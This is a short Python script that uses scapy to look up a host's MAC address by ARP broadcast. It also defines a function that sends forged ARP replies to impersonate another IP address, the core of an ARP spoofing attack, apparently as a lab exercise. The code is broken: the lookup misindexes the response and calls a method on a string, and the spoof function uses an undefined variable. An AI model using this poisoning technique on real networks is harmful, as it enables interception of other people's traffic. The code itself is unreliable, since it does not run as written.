#!/usr/bin/env python
import scapy.all as scapy

def get_mac(ip):
    arp_request= scapy.ARP(pdst=ip)
    broadcast= scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
    arp_request_broadcast= broadcast/arp_request
    answred_list = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0][1].hwdst
    print(answred_list.summary())
    


def response(target_ip,spoof_ip):
    packet = scapy.ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip)
    scapy.send(packet)

get_mac("10.0.2.2")
